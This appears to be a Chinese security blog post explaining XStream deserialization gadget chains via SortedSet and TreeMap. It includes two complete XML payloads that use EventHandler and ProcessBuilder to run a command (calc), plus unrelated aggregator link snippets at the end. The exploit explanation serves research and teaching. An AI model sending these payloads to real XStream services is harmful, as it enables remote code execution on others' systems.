【Web】浅聊XStream反序列化之SortedSetTreeMap利用链

前文:【Web】浅聊XStream反序列化本源之恶意动态代理注入-CSDN博客

前言

在上一篇文章我们聊到可以用XStream反序列化来进行恶意动态代理的注入,但其有一个很大的限制就是必须要知道目标靶机会调用哪个接口的方法,才能去相应地精心构造对应接口的动态代理类,触发EventHandler从而进行恶意命令执行。

有没有通用性更强的解决方案,不需要靶机执行某接口方法,只要完成反序列化的过程就可以直接利用呢?

自然是有的,下面我们就来介绍SortedSet和TreeMap两条链

复现

SortedSetExp.java

package com.XStream;

import com.thoughtworks.xstream.XStream;

import java.io.FileInputStream;

public class SortedSetExp {
    public static void main(String[] args) throws Exception{
        FileInputStream fileInputStream = new FileInputStream("payload.xml");
        XStream xStream = new XStream();
        xStream.fromXML(fileInputStream);
    }
}

payload.xml

<sorted-set>
    <string>foo</string>
    <dynamic-proxy>
        <interface>java.lang.Comparable</interface>
        <handler class='java.beans.EventHandler'>
            <target class='java.lang.ProcessBuilder'>
                <command>
                    <string>calc</string>
                </command>
            </target>
            <action>start</action>
        </handler>
    </dynamic-proxy>
</sorted-set>

TreeMapExp

package com.XStream;

import com.thoughtworks.xstream.XStream;

import java.io.FileInputStream;

public class TreeMapExp {
    public static void main(String[] args) throws Exception{
        FileInputStream fileInputStream = new FileInputStream("payload2.xml");
        XStream xStream = new XStream();
        xStream.fromXML(fileInputStream);
    }
}

payload2.xml

<tree-map>
    <entry>
        <string>fookey</string>
        <string>foovalue</string>
    </entry>
    <entry>
        <dynamic-proxy>
            <interface>java.lang.Comparable</interface>
            <handler class='java.beans.EventHandler'>
                <target class='java.lang.ProcessBuilder'>
                    <command>
                        <string>calc</string>
                    </command>
                </target>
                <action>start</action>
            </handler>
        </dynamic-proxy>
        <string>good</string>
    </entry>
</tree-map>

根源的原理

记住我们的目的:只要完成反序列化的过程就可以直接调用动态代理类的Eventhandler#invoke,为此我们需要让动态代理类接口的某个方法在反序列化还原过程中自动调用

这里大佬们找到的是Comparable接口的compareTo方法

在TreeMap的put方法里就进行了compareTo方法的调用,而下面的两条链,其实最后都是依托TreeMap#put来完成反序列化的数据结构还原的,这和我们的目标一拍即合。

 

SortedSet链分析

一开始是HierarchicalStreams.readClassType获取待反序列化类的Class对象,前半段和上篇文章讲的一样,不作赘述,我们直接关注不一样的点

来到DynamicProxyMapper#realClass,注意elementName和alias是不相等的

会继续调用super.realClass作为返回值type

跟进

跟进DefaultMapper.realClass,取到一个加载的SortedSet类(注意initialize参数为false,所以并未初始化)

 返回的type就是SortedSet.class

接着进到convertAnother对该类进行实例化

先是进行一个类型转化 ,mapper.defaultImplementationOf() 用于设定某个接口或抽象类的默认实现,以确保在没有显式指定实现的情况下,能够使用预设的默认实现。这样可以简化代码中对实现的选择和配置。

 成功将SortedSet转化为默认实现类型TreeSet

接着调用lookupConverterForType来取对应的converter,这里的this.converterLookup就是XStream

 跟进XStream#lookupConverterForType

跟进defaultConverterLookup.lookupConverterForType,这里的逻辑是,迭代this.converters,直到找到能转换出TreeSet类型,最后取到converter为TreeSetConverter

 然后传参进convert调用

跟进,调用TreeSetConverter#unmarshal

 跟进,调用TreeMapConverter#populateTreeMap,顾名思义,就是开始填充TreeMap

 先创建一个空sortedMap

循环取出所有反序列化完毕的元素存到sortedMap 

 这个sortedMap只是一个缓存的地方,真正的返回值是TreeMap。之后判断JVM是否全部缓存好元素了,然后把sortedMap的缓存元素全部放入TreeMap作为反序列化的返回对象

简单跟一跟

 最后调用了k(也就是动态代理类)的compareTo方法,传入参数是第一个key String

从而进到EventHandler#invoke,进行恶意命令的调用,这部分和上篇文章讲的一样,不再赘述。

TreeMap链分析

先是取到type为java.util.TreeMap

 后续type没有进行默认类型转换

取到TreeMapConverter来进行convert还原待反序列化

最后又进了TreeMapConverter#populateTreeMap,来到了熟悉的环节,后面就和上面讲的一样了,不再赘述


http://www.niftyadmin.cn/n/5430713.html

相关文章

模拟栈(模板)

[Acwing 828.模拟栈] 实现一个栈&#xff0c;栈初始为空&#xff0c;支持四种操作&#xff1a; push x – 向栈顶插入一个数 x x x&#xff1b; pop – 从栈顶弹出一个数&#xff1b; empty – 判断栈是否为空&#xff1b; query – 查询栈顶元素。 现在要对栈进行 M M M 个…

vitepress里使用gitalk(图文教程)

vitepress里使用gitalk Gitalk 是一个基于 GitHub Issue 和 Preact 开发的评论插件 生成client配置 创建OAuth application 填写完毕&#xff0c;点击 Register application 即可 生成client secrets 一开始没有自动生成 Client secrets&#xff0c;需要手动生成&#xff…

uniapp 自动更新版本并安装

首先 我们在app打包的时候回去设置版本号&#xff0c;用来了解当前版本具体更新了哪些功能&#xff1b;所以在app更新的时候&#xff0c;首先去获取我们的版本号&#xff1b; App.vue onLaunch: function() {console.info(plus.runtime.appid,plus.runtime.appid)plus.runtim…

ECMAScript标准-默认导出和导入

导出&#xff1a; export default{} const baseURL "http://www.baidu.com" export default{url:baseURL } 导入&#xff1a; import 变量名(自己定义的变量名&#xff0c;全部加载&#xff09; from ‘模块名或路径’ import obj from ./commonjs.js console.…

系统重装后git客户端的设置恢复

安装git 安装Tortoisegit 在git-bash中执行&#xff1a; ssh-keygen -t ed25519 -C ‘Gitee SSH Key’ 读取c:/user/rainpet/.ssh/id_ed25519.pub 将内容赋值&#xff0c;放到gitee的ssh的公钥中 在cmd中执行&#xff0c;ssh -T gitgitee.com 就会将ssh key与gitee的用户…

CCF 202009-3 点亮数字人生(拓扑排序)

题目背景 土豪大学的计算机系开了一门数字逻辑电路课&#xff0c;第一个实验叫做“点亮数字人生”&#xff0c;要用最基础的逻辑元件组装出实际可用的电路。时间已经是深夜了&#xff0c;尽管实验箱上密密麻麻的连线已经拆装了好几遍&#xff0c;小君同学却依旧没能让她的电路正…

大语言模型系列-中文开源大模型

文章目录 前言一、主流开源大模型二、中文开源大模型排行榜 前言 近期&#xff0c;OpenAI 的主要竞争者 Anthropic 推出了他们的新一代大型语言模型 Claude 3&#xff0c;该系列涵盖了三个不同规模的模型&#xff1a;Opus、Sonnet 和 Haiku。 Claude 3声称已经全面超越GPT-4。…

Vue开发日志:清空表单数据

清空表单数据 清空表单策略1. 对于基于v-model绑定的基础表单2. 使用Element UI库的el-form组件3. 复杂数据结构的清空讨论 4. v-if控制表单显示 清空表单策略 在Vue.js中&#xff0c;清空表单数据的方法可以根据你的表单绑定和使用的组件库有所不同。 以下是一些通用的策略&a…